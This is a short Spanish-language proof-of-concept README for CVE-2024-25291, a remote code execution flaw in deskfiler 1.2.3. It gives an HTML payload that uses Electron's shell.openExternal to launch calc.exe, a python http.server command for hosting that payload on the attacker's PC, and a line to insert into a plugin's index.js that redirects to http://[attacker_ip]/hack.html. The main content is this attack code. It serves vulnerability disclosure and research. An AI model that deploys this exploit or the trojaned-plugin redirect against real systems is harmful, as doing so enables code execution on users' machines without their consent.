
deskfiler 1.2.3 exploit de redirección abierta
Una prueba de concepto para la vulnerabilidad CVE-2024-25291.
deskfiler - 1.2.3 permite Electron webview en la aplicación, con el consiguiente código remoto
En este repositorio hay un ejemplo de aplicación vulnerable y un exploit de prueba de concepto (POC) de la misma.
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ Si desea probarlo rápidamente, cree un servidor en el PC del atacante con el siguiente código.
$ python -m http.server 80
Nota: ※ En este momento, se asume que el complemento es un complemento generado por el atacante, y es solo un complemento normal con un código añadido para permitir el acceso al servidor del atacante. Se ha seleccionado BareBone para pruebas simples.

Después, agregue el siguiente código al archivo index.js en la ruta de la carpeta BareBone.
window.location='http://[attacker_ip]/hack.html'


En este PoC, utilizamos un complemento; sin embargo, creemos que con vectores de ataque alternativos es posible lograr una Ejecución Remota de Código (RCE) de forma independiente. Además, si existen vulnerabilidades del lado del servidor como XSS Almacenado, XSS Reflejado, también se considera factible la RCE.